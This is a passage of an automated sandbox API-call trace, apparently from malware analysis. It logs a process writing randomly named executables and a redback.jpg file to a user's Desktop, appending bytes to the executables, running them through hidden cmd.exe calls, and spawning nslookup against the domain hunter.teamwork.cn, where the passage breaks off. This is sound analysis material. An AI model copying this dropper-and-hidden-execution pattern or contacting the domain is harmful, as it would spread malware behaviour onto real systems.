SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x5d6f1a4) returned 1 [0195.211] GetFileType (hFile=0x430) returned 0x1 [0195.211] WriteFile (in: hFile=0x430, lpBuffer=0x315abf0*, nNumberOfBytesToWrite=0xc50, lpNumberOfBytesWritten=0x5d6f22c, lpOverlapped=0x0 | out: lpBuffer=0x315abf0*, lpNumberOfBytesWritten=0x5d6f22c*=0xc50, lpOverlapped=0x0) returned 1 [0195.214] CloseHandle (hObject=0x430) returned 1 [0195.359] GetFullPathNameW (in: lpFileName="redback.jpg", nBufferLength=0x105, lpBuffer=0x5d6ec64, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\FD1HVy\\Desktop\\redback.jpg", lpFilePart=0x0) returned 0x23 [0195.359] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x5d6f1a8) returned 1 [0195.359] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Desktop\\redback.jpg" (normalized: "c:\\users\\fd1hvy\\desktop\\redback.jpg"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x430 [0195.361] GetFileType (hFile=0x430) returned 0x1 [0195.361] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x5d6f1a4) returned 1 [0195.361] GetFileType (hFile=0x430) returned 0x1 [0195.361] WriteFile (in: hFile=0x430, lpBuffer=0x40f94c8*, nNumberOfBytesToWrite=0x321c1, lpNumberOfBytesWritten=0x5d6f258, lpOverlapped=0x0 | out: lpBuffer=0x40f94c8*, lpNumberOfBytesWritten=0x5d6f258*=0x321c1, lpOverlapped=0x0) returned 1 [0195.375] CloseHandle (hObject=0x430) returned 1 [0195.813] GetFullPathNameW (in: lpFileName="qq3d1t429055.exe", nBufferLength=0x105, lpBuffer=0x5d6ed14, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\FD1HVy\\Desktop\\qq3d1t429055.exe", lpFilePart=0x0) returned 0x28 [0195.813] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x5d6f214) returned 1 [0195.813] GetFileAttributesExW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\qq3d1t429055.exe" (normalized: "c:\\users\\fd1hvy\\desktop\\qq3d1t429055.exe"), fInfoLevelId=0x0, lpFileInformation=0x315bea4 | out: lpFileInformation=0x315bea4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x78aed5c5, ftCreationTime.dwHighDateTime=0x1d5ed52, ftLastAccessTime.dwLowDateTime=0x78aed5c5, ftLastAccessTime.dwHighDateTime=0x1d5ed52, ftLastWriteTime.dwLowDateTime=0x78b137d0, ftLastWriteTime.dwHighDateTime=0x1d5ed52, nFileSizeHigh=0x0, nFileSizeLow=0x4600)) returned 1 [0195.814] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x5d6f210) returned 1 [0195.814] GetFullPathNameW (in: lpFileName="qq3d1t429055.exe", nBufferLength=0x105, lpBuffer=0x5d6ec38, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\FD1HVy\\Desktop\\qq3d1t429055.exe", lpFilePart=0x0) returned 0x28 [0195.814] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x5d6f17c) returned 1 [0195.815] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Desktop\\qq3d1t429055.exe" (normalized: "c:\\users\\fd1hvy\\desktop\\qq3d1t429055.exe"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x430 [0195.815] GetFileType (hFile=0x430) returned 0x1 [0195.815] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x5d6f178) returned 1 [0195.815] GetFileType (hFile=0x430) returned 0x1 [0195.815] SetFilePointer (in: hFile=0x430, lDistanceToMove=0, lpDistanceToMoveHigh=0x5d6f150*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x5d6f150*=0) returned 0x4600 [0195.816] WriteFile (in: hFile=0x430, lpBuffer=0x315bff4*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x5d6f20c, lpOverlapped=0x0 | out: lpBuffer=0x315bff4*, lpNumberOfBytesWritten=0x5d6f20c*=0x100, lpOverlapped=0x0) returned 1 [0195.816] CloseHandle (hObject=0x430) returned 1 [0195.822] GetStdHandle (nStdHandle=0xfffffff6) returned 0x0 [0195.822] CreatePipe (in: hReadPipe=0x5d6f19c, hWritePipe=0x5d6f198, lpPipeAttributes=0x5d6f11c, nSize=0x0 | out: hReadPipe=0x5d6f19c*=0x430, hWritePipe=0x5d6f198*=0x3d8) returned 1 [0195.823] GetCurrentProcess () returned 0xffffffff [0195.824] GetCurrentProcess () returned 0xffffffff [0195.824] DuplicateHandle (in: hSourceProcessHandle=0xffffffff, hSourceHandle=0x430, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x5d6f1a0, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x5d6f1a0*=0x444) returned 1 [0195.824] CloseHandle (hObject=0x430) returned 1 [0195.824] CreatePipe (in: hReadPipe=0x5d6f19c, hWritePipe=0x5d6f198, lpPipeAttributes=0x5d6f11c, nSize=0x0 | out: hReadPipe=0x5d6f19c*=0x430, hWritePipe=0x5d6f198*=0x474) returned 1 [0195.825] GetCurrentProcess () returned 0xffffffff [0195.825] GetCurrentProcess () returned 0xffffffff [0195.825] DuplicateHandle (in: hSourceProcessHandle=0xffffffff, hSourceHandle=0x430, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x5d6f1a0, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x5d6f1a0*=0x478) returned 1 [0195.825] CloseHandle (hObject=0x430) returned 1 [0195.825] CoTaskMemAlloc (cb=0x20e) returned 0x15d5880 [0195.825] GetCurrentDirectoryW (in: nBufferLength=0x105, lpBuffer=0x15d5880 | out: lpBuffer="C:\\Users\\FD1HVy\\Desktop") returned 0x17 [0195.826] CoTaskMemFree (pv=0x15d5880) [0195.826] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="\"cmd.exe\" /c qq3d1t429055.exe", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x8000000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\FD1HVy\\Desktop", lpStartupInfo=0x5d6f0e4*(cb=0x44, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x100, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x3d8, hStdError=0x474), lpProcessInformation=0x315d25c | out: lpCommandLine="\"cmd.exe\" /c qq3d1t429055.exe", lpProcessInformation=0x315d25c*(hProcess=0x47c, hThread=0x430, dwProcessId=0x9d0, dwThreadId=0x1158)) returned 1 [0196.005] CloseHandle (hObject=0x3d8) returned 1 [0196.005] CloseHandle (hObject=0x474) returned 1 [0196.005] GetFileType (hFile=0x444) returned 0x3 [0196.007] GetFileType (hFile=0x478) returned 0x3 [0196.008] CloseHandle (hObject=0x430) returned 1 [0196.008] GetCurrentProcess () returned 0xffffffff [0196.008] GetCurrentProcess () returned 0xffffffff [0196.008] DuplicateHandle (in: hSourceProcessHandle=0xffffffff, hSourceHandle=0x47c, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x5d6f25c, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x5d6f25c*=0x430) returned 1 [0243.464] CloseHandle (hObject=0x430) returned 1 [0243.466] ReadFile (in: hFile=0x444, lpBuffer=0x315ec7c, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x5d6f27c, lpOverlapped=0x0 | out: lpBuffer=0x315ec7c*, lpNumberOfBytesRead=0x5d6f27c*=0x57, lpOverlapped=0x0) returned 1 [0243.467] ReadFile (in: hFile=0x444, lpBuffer=0x315ec7c, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x5d6f27c, lpOverlapped=0x0 | out: lpBuffer=0x315ec7c, lpNumberOfBytesRead=0x5d6f27c*=0x0, lpOverlapped=0x0) returned 0 [0243.468] ReadFile (in: hFile=0x478, lpBuffer=0x3161d38, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x5d6f27c, lpOverlapped=0x0 | out: lpBuffer=0x3161d38, lpNumberOfBytesRead=0x5d6f27c*=0x0, lpOverlapped=0x0) returned 0 [0243.470] GetFullPathNameW (in: lpFileName="ekati.log", nBufferLength=0x105, lpBuffer=0x5d6ece8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\FD1HVy\\Desktop\\ekati.log", lpFilePart=0x0) returned 0x21 [0243.471] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x5d6f19c) returned 1 [0243.472] GetFileAttributesExW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\ekati.log" (normalized: "c:\\users\\fd1hvy\\desktop\\ekati.log"), fInfoLevelId=0x0, lpFileInformation=0x5d6f218 | out: lpFileInformation=0x5d6f218*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x60904d03, ftCreationTime.dwHighDateTime=0x1d5ed52, ftLastAccessTime.dwLowDateTime=0x60904d03, ftLastAccessTime.dwHighDateTime=0x1d5ed52, ftLastWriteTime.dwLowDateTime=0x811cb148, ftLastWriteTime.dwHighDateTime=0x1d5ed52, nFileSizeHigh=0x0, nFileSizeLow=0x528)) returned 1 [0243.473] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x5d6f198) returned 1 [0243.474] GetFullPathNameW (in: lpFileName="ekati.log", nBufferLength=0x105, lpBuffer=0x5d6ece8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\FD1HVy\\Desktop\\ekati.log", lpFilePart=0x0) returned 0x21 [0243.474] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x5d6f1e8) returned 1 [0243.474] GetFileAttributesExW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\ekati.log" (normalized: "c:\\users\\fd1hvy\\desktop\\ekati.log"), fInfoLevelId=0x0, lpFileInformation=0x317724c | out: lpFileInformation=0x317724c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x60904d03, ftCreationTime.dwHighDateTime=0x1d5ed52, ftLastAccessTime.dwLowDateTime=0x60904d03, ftLastAccessTime.dwHighDateTime=0x1d5ed52, ftLastWriteTime.dwLowDateTime=0x811cb148, ftLastWriteTime.dwHighDateTime=0x1d5ed52, nFileSizeHigh=0x0, nFileSizeLow=0x528)) returned 1 [0243.474] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x5d6f1e4) returned 1 [0243.475] GetFullPathNameW (in: lpFileName="ekati.log", nBufferLength=0x105, lpBuffer=0x5d6ebc8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\FD1HVy\\Desktop\\ekati.log", lpFilePart=0x0) returned 0x21 [0243.476] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x5d6f10c) returned 1 [0243.476] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Desktop\\ekati.log" (normalized: "c:\\users\\fd1hvy\\desktop\\ekati.log"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x430 [0243.478] GetFileType (hFile=0x430) returned 0x1 [0243.478] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x5d6f108) returned 1 [0243.478] GetFileType (hFile=0x430) returned 0x1 [0243.478] SetFilePointer (in: hFile=0x430, lDistanceToMove=0, lpDistanceToMoveHigh=0x5d6f0e0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x5d6f0e0*=0) returned 0x528 [0243.482] WriteFile (in: hFile=0x430, lpBuffer=0x3178a24*, nNumberOfBytesToWrite=0x5a, lpNumberOfBytesWritten=0x5d6f19c, lpOverlapped=0x0 | out: lpBuffer=0x3178a24*, lpNumberOfBytesWritten=0x5d6f19c*=0x5a, lpOverlapped=0x0) returned 1 [0243.484] CloseHandle (hObject=0x430) returned 1 [0243.555] CoUninitialize () Thread: id = 11 os_tid = 0x1358 [0160.510] CoInitializeEx (pvReserved=0x0, dwCoInit=0x0) returned 0x0 [0160.510] RoInitialize () returned 0x1 [0160.510] RoUninitialize () returned 0x0 [0194.981] GetFullPathNameW (in: lpFileName="onc2pn4u4214.exe", nBufferLength=0x105, lpBuffer=0x5eae954, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\FD1HVy\\Desktop\\onc2pn4u4214.exe", lpFilePart=0x0) returned 0x28 [0194.981] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x5eaee98) returned 1 [0194.982] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Desktop\\onc2pn4u4214.exe" (normalized: "c:\\users\\fd1hvy\\desktop\\onc2pn4u4214.exe"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x430 [0195.221] GetFileType (hFile=0x430) returned 0x1 [0195.221] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x5eaee94) returned 1 [0195.221] GetFileType (hFile=0x430) returned 0x1 [0195.221] WriteFile (in: hFile=0x430, lpBuffer=0x3152a1c*, nNumberOfBytesToWrite=0x2a00, lpNumberOfBytesWritten=0x5eaef48, lpOverlapped=0x0 | out: lpBuffer=0x3152a1c*, lpNumberOfBytesWritten=0x5eaef48*=0x2a00, lpOverlapped=0x0) returned 1 [0195.225] CloseHandle (hObject=0x430) returned 1 [0195.830] GetFullPathNameW (in: lpFileName="onc2pn4u4214.exe", nBufferLength=0x105, lpBuffer=0x5eaea04, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\FD1HVy\\Desktop\\onc2pn4u4214.exe", lpFilePart=0x0) returned 0x28 [0195.830] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x5eaef04) returned 1 [0195.830] GetFileAttributesExW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\onc2pn4u4214.exe" (normalized: "c:\\users\\fd1hvy\\desktop\\onc2pn4u4214.exe"), fInfoLevelId=0x0, lpFileInformation=0x315da30 | out: lpFileInformation=0x315da30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x788fdaa4, ftCreationTime.dwHighDateTime=0x1d5ed52, ftLastAccessTime.dwLowDateTime=0x788fdaa4, ftLastAccessTime.dwHighDateTime=0x1d5ed52, ftLastWriteTime.dwLowDateTime=0x78b5fd29, ftLastWriteTime.dwHighDateTime=0x1d5ed52, nFileSizeHigh=0x0, nFileSizeLow=0x2a00)) returned 1 [0195.830] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x5eaef00) returned 1 [0195.830] GetFullPathNameW (in: lpFileName="onc2pn4u4214.exe", nBufferLength=0x105, lpBuffer=0x5eae928, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\FD1HVy\\Desktop\\onc2pn4u4214.exe", lpFilePart=0x0) returned 0x28 [0195.830] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x5eaee6c) returned 1 [0195.831] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Desktop\\onc2pn4u4214.exe" (normalized: "c:\\users\\fd1hvy\\desktop\\onc2pn4u4214.exe"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x430 [0195.831] GetFileType (hFile=0x430) returned 0x1 [0195.831] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x5eaee68) returned 1 [0195.831] GetFileType (hFile=0x430) returned 0x1 [0195.831] SetFilePointer (in: hFile=0x430, lDistanceToMove=0, lpDistanceToMoveHigh=0x5eaee40*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x5eaee40*=0) returned 0x2a00 [0195.832] WriteFile (in: hFile=0x430, lpBuffer=0x315db80*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x5eaeefc, lpOverlapped=0x0 | out: lpBuffer=0x315db80*, lpNumberOfBytesWritten=0x5eaeefc*=0x100, lpOverlapped=0x0) returned 1 [0195.832] CloseHandle (hObject=0x430) returned 1 [0196.009] GetStdHandle (nStdHandle=0xfffffff6) returned 0x0 [0196.010] CreatePipe (in: hReadPipe=0x5eaee8c, hWritePipe=0x5eaee88, lpPipeAttributes=0x5eaee0c, nSize=0x0 | out: hReadPipe=0x5eaee8c*=0x474, hWritePipe=0x5eaee88*=0x3d8) returned 1 [0196.010] GetCurrentProcess () returned 0xffffffff [0196.010] GetCurrentProcess () returned 0xffffffff [0196.011] DuplicateHandle (in: hSourceProcessHandle=0xffffffff, hSourceHandle=0x474, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x5eaee90, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x5eaee90*=0x484) returned 1 [0196.011] CloseHandle (hObject=0x474) returned 1 [0196.011] CreatePipe (in: hReadPipe=0x5eaee8c, hWritePipe=0x5eaee88, lpPipeAttributes=0x5eaee0c, nSize=0x0 | out: hReadPipe=0x5eaee8c*=0x474, hWritePipe=0x5eaee88*=0x480) returned 1 [0196.012] GetCurrentProcess () returned 0xffffffff [0196.012] GetCurrentProcess () returned 0xffffffff [0196.012] DuplicateHandle (in: hSourceProcessHandle=0xffffffff, hSourceHandle=0x474, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x5eaee90, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x5eaee90*=0x488) returned 1 [0196.012] CloseHandle (hObject=0x474) returned 1 [0196.012] CoTaskMemAlloc (cb=0x20e) returned 0x15d5880 [0196.012] GetCurrentDirectoryW (in: nBufferLength=0x105, lpBuffer=0x15d5880 | out: lpBuffer="C:\\Users\\FD1HVy\\Desktop") returned 0x17 [0196.013] CoTaskMemFree (pv=0x15d5880) [0196.013] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="\"cmd.exe\" /c onc2pn4u4214.exe", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x8000000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\FD1HVy\\Desktop", lpStartupInfo=0x5eaedd4*(cb=0x44, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x100, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x3d8, hStdError=0x480), lpProcessInformation=0x3164fd8 | out: lpCommandLine="\"cmd.exe\" /c onc2pn4u4214.exe", lpProcessInformation=0x3164fd8*(hProcess=0x48c, hThread=0x474, dwProcessId=0xfac, dwThreadId=0xfa8)) returned 1 [0196.464] CloseHandle (hObject=0x3d8) returned 1 [0196.465] CloseHandle (hObject=0x480) returned 1 [0196.465] GetFileType (hFile=0x484) returned 0x3 [0196.465] GetFileType (hFile=0x488) returned 0x3 [0196.466] CloseHandle (hObject=0x474) returned 1 [0196.466] GetCurrentProcess () returned 0xffffffff [0196.466] GetCurrentProcess () returned 0xffffffff [0196.466] DuplicateHandle (in: hSourceProcessHandle=0xffffffff, hSourceHandle=0x48c, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x5eaef4c, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x5eaef4c*=0x474) returned 1 Thread: id = 30 os_tid = 0x474 Process: id = "2" image_name = "nslookup.exe" filename = "c:\\windows\\syswow64\\nslookup.exe" page_root = "0x12470000" os_pid = "0x1360" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "1" os_parent_pid = "0x1224" cmd_line = "\"nslookup.exe\" hunter.teamwork.cn" cur_dir = "C:\\Users\\FD1HVy\\Desktop\\" os_username = "NQDPDE\\FD1HVy" bitness = "32" os_groups = "NQDPDE\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000f8ee" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 12 os_tid = 0x1284 [0179.218] GetModuleHandleA (lpModuleName=0x0) returned 0x990000 [0179.218] __set_app_type (_Type=0x1) [0179.218] __p__fmode () returned 0x74ff3c14 [0179.218] __p__commode () returned 0x74ff49ec [0179.218] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x99c8a0) returned 0x0 [0179.219] __getmainargs (in: _Argc=0x9a1888, _Argv=0x9a188c, _Env=0x9a1890, _DoWildCard=0, _StartInfo=0x9a189c | out: _Argc=0x9a1888, _Argv=0x9a188c, _Env=0x9a1890) returned 0 [0179.219] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0179.219] SetThreadUILanguage (LangId=0x0) returned 0x2e80409 [0180.034] WSAStartup (in: wVersionRequired=0x202, lpWSAData=0x9a2060 | out: lpWSAData=0x9a2060) returned 0 [0180.048] malloc (_Size=0x40) returned 0x3040da8 [0180.048] socket (af=2, type=2, protocol=0) returned 0x10c [0180.054] closesocket (s=0x10c) returned 0 [0180.055] RtlIpv4StringToAddressA () returned 0x0 [0180.055] RtlInitString (in: DestinationString=0x2d1fda0, SourceString="\\Registry\\Machine\\System\\CurrentControlSet\\Services\\Tcpip\\Parameters" | out: DestinationString="\\Registry\\Machine\\System\\CurrentControlSet\\Services\\Tcpip\\Parameters") [0180.055] RtlAnsiStringToUnicodeString (in: DestinationString=0x2d1fda8, SourceString="\\Registry\\Machine\\System\\CurrentControlSet\\Services\\Tcpip\\Parameters", AllocateDestinationString=1 | out: DestinationString="\\Registry\\Machine\\System\\CurrentControlSet\\Services\\Tcpip\\Parameters") returned 0x0 [0180.055] NtOpenKey (in: KeyHandle=0x2d1fddc, DesiredAccess=0x20019, ObjectAttributes=0x2d1fd88*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\Machine\\System\\CurrentControlSet\\Services\\Tcpip\\Parameters", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0) | out: KeyHandle=0x2d1fddc*=0x10c) returned 0x0 [0180.056] RtlFreeAnsiString (AnsiString="\\") [0180.056] malloc (_Size=0x3200) returned 0x30421f0 [0180.056] RtlAllocateHeap (HeapHandle=0x3200000, Flags=0x0, Size=0x400) returned 0x320fc90 [0180.057] RtlAllocateHeap (HeapHandle=0x3200000, Flags=0x0, Size=0x400) returned 0x3210098 [0180.057] RtlAnsiStringToUnicodeString (in: DestinationString=0x2d1fd94, SourceString="DNSLookupOrder", AllocateDestinationString=0 | out: DestinationString="DNSLookupOrder") returned 0x0 [0180.057] NtQueryValueKey (in: KeyHandle=0x10c, ValueName="DNSLookupOrder", KeyValueInformationClass=0x1, KeyValueInformation=0x320fc90, Length=0x400, ResultLength=0x2d1fd9c | out: KeyValueInformation=0x320fc90, ResultLength=0x2d1fd9c) returned 0xc0000034 [0180.057] RtlFreeHeap (HeapHandle=0x3200000, Flags=0x0, BaseAddress=0x3210098) returned 1 [0180.057] RtlFreeHeap (HeapHandle=0x3200000, Flags=0x0, BaseAddress=0x320fc90) returned 1 [0180.057] RtlAllocateHeap (HeapHandle=0x3200000, Flags=0x0, Size=0x400) returned 0x320fc90 [0180.057] RtlAllocateHeap (HeapHandle=0x3200000, Flags=0x0, Size=0x400) returned 0x3210098 [0180.057] RtlAnsiStringToUnicodeString (in: DestinationString=0x2d1fd94, SourceString="Domain", AllocateDestinationString=0 | out: DestinationString="Domain") returned 0x0 [0180.057] NtQueryValueKey (in: KeyHandle=0x10c, ValueName="Domain", KeyValueInformationClass=0x1, KeyValueInformation=0x320fc90, Length=0x400, ResultLength=0x2d1fd9c | out: KeyValueInformation=0x320fc90*(TitleIndex=0x0, Type=0x1, DataOffset=0x20, DataLength=0x2, NameLength=0xc, Name="Domain", Data=""), ResultLength=0x2d1fd9c) returned 0x0 [0180.057] RtlFreeHeap (HeapHandle=0x3200000, Flags=0x0, BaseAddress=0x3210098) returned 1 [0180.057] RtlUnicodeStringToAnsiString (in: DestinationString=0x2d1fd8c, SourceString="", AllocateDestinationString=0 | out: DestinationString="") returned 0x0 [0180.058] RtlFreeHeap (HeapHandle=0x3200000, Flags=0x0, BaseAddress=0x320fc90) returned 1 [0180.058] RtlAllocateHeap (HeapHandle=0x3200000, Flags=0x0, Size=0x400) returned 0x320fc90 [0180.058] RtlAllocateHeap (HeapHandle=0x3200000, Flags=0x0, Size=0x400) returned 0x3210098 [0180.058] RtlAnsiStringToUnicodeString (in: DestinationString=0x2d1fd94, SourceString="DhcpDomain", AllocateDestinationString=0 | out: DestinationString="DhcpDomain") returned 0x0 [0180.058] NtQueryValueKey (in: KeyHandle=0x10c, ValueName="DhcpDomain", KeyValueInformationClass=0x1, KeyValueInformation=0x320fc90, Length=0x400, ResultLength=0x2d1fd9c | out: KeyValueInformation=0x320fc90, ResultLength=0x2d1fd9c) returned 0xc0000034 [0180.058] RtlFreeHeap (HeapHandle=0x3200000, Flags=0x0, BaseAddress=0x3210098) returned 1 [0180.058] RtlFreeHeap (HeapHandle=0x3200000, Flags=0x0, BaseAddress=0x320fc90) returned 1 [0180.058] RtlInitString (in: DestinationString=0x2d1fda0, SourceString="\\Registry\\Machine\\Software\\Policies\\Microsoft\\Windows NT\\DNSClient" | out: DestinationString="\\Registry\\Machine\\Software\\Policies\\Microsoft\\Windows NT\\DNSClient") [0180.058] RtlAnsiStringToUnicodeString (in: DestinationString=0x2d1fda8, SourceString="\\Registry\\Machine\\Software\\Policies\\Microsoft\\Windows NT\\DNSClient", AllocateDestinationString=1 | out: DestinationString="\\Registry\\Machine\\Software\\Policies\\Microsoft\\Windows NT\\DNSClient") returned 0x0 [0180.058] NtOpenKey (in: KeyHandle=0x2d1fdc8, DesiredAccess=0x20019, ObjectAttributes=0x2d1fd88*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\Machine\\Software\\Policies\\Microsoft\\Windows NT\\DNSClient", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0) | out: KeyHandle=0x2d1fdc8*=0x0) returned 0xc0000034 [0180.058] RtlFreeAnsiString (AnsiString="\\") [0180.058] RtlAllocateHeap (HeapHandle=0x3200000, Flags=0x0, Size=0x400) returned 0x320fc90 [0180.059] RtlAllocateHeap (HeapHandle=0x3200000, Flags=0x0, Size=0x400) returned 0x3210098 [0180.059] RtlAnsiStringToUnicodeString (in: DestinationString=0x2d1fd94, SourceString="SearchList", AllocateDestinationString=0 | out: DestinationString="SearchList") returned 0x0 [0180.060] NtQueryValueKey (in: KeyHandle=0x10c, ValueName="SearchList", KeyValueInformationClass=0x1, KeyValueInformation=0x320fc90, Length=0x400, ResultLength=0x2d1fd9c | out: KeyValueInformation=0x320fc90, ResultLength=0x2d1fd9c) returned 0xc0000034 [0180.060] RtlFreeHeap (HeapHandle=0x3200000, Flags=0x0, BaseAddress=0x3210098) returned 1 [0180.060] RtlFreeHeap (HeapHandle=0x3200000, Flags=0x0, BaseAddress=0x320fc90) returned 1 [0180.060] RtlAllocateHeap (HeapHandle=0x3200000, Flags=0x0, Size=0x400) returned 0x320fc90 [0180.060] RtlAllocateHeap (HeapHandle=0x3200000, Flags=0x0, Size=0x400) returned 0x3210098 [0180.060] RtlAnsiStringToUnicodeString (in: DestinationString=0x2d1fd94, SourceString="DhcpSearchList", AllocateDestinationString=0 | out: DestinationString="DhcpSearchList") returned 0x0 [0180.060] NtQueryValueKey (in: KeyHandle=0x10c, ValueName="DhcpSearchList", KeyValueInformationClass=0x1, KeyValueInformation=0x320fc90, Length=0x400, ResultLength=0x2d1fd9c | out: KeyValueInformation=0x320fc90, ResultLength=0x2d1fd9c) returned 0xc0000034 [0180.060] RtlFreeHeap (HeapHandle=0x3200000, Flags=0x0, BaseAddress=0x3210098) returned 1 [0180.060] RtlFreeHeap (HeapHandle=0x3200000, Flags=0x0, BaseAddress=0x320fc90) returned 1 [0180.061] gethostname (in: name=0x30421f0, namelen=12800 | out: name="NQdPdE") returned 0 [0182.725] free (_Block=0x30421f0) [0182.725] malloc (_Size=0x10) returned 0x3041078 [0182.725] getenv (_VarName="HOME") returned 0x0 [0182.726] DnsQueryConfigAllocEx () returned 0x321bda8 [0185.765] _vsnprintf_s (in: _DstBuf=0x2d1fcd8, _DstSize=0x1f, _MaxCount=0x1e, _Format="%u.%u.%u.%u.in-addr.arpa.", _ArgList=0x2d0fca4 | out: _DstBuf="1.0.168.192.in-addr.arpa.") returned 25 [0185.766] htons (hostshort=0x1) returned 0x100 [0185.766] htons (hostshort=0x1) returned 0x100 [0185.771] socket (af=2, type=2, protocol=0) returned 0x194 [0185.772] connect (s=0x194, name=0x321bdc8*(sa_family=2, sin_port=0x35, 